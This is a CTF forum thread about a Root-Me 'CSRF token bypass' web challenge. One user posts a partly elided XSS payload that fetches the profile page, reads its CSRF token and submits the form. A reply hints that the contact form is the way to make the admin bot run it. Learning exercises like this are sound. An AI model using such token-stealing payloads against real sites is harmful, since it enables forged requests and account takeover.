Web - Client
Web - Client | CSRF token bypass
Hello, guys. I got a problem with that task. The script works great, but nothing changed when the bot got a message with payload.
I was trying to exploit it using XSS on the ’search’ page.
script.js
============================
var csrfProtectedPage = ’http://challenge01.root-me.org/web-client/ch23/?action=profile’;
var csrfProtectedForm = ’profile’;// get valid token for current request
var html = get(csrfProtectedPage);
document.body.innerHTML = html;
var form = document.getElementById(csrfProtectedForm);
var token = form.token.value;// build form with valid token
...// submit form
document.getElementById("profile").submit();function get(url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", url, false);
xmlHttp.send(null);
return xmlHttp.responseText;
============================
Web - Client | CSRF token bypass
If you use it on the search page it will not be the admin validating your account but you trying to validate your self. I am stuck as well on this challenge but i think you have to work around the contact form.
New reply
New topic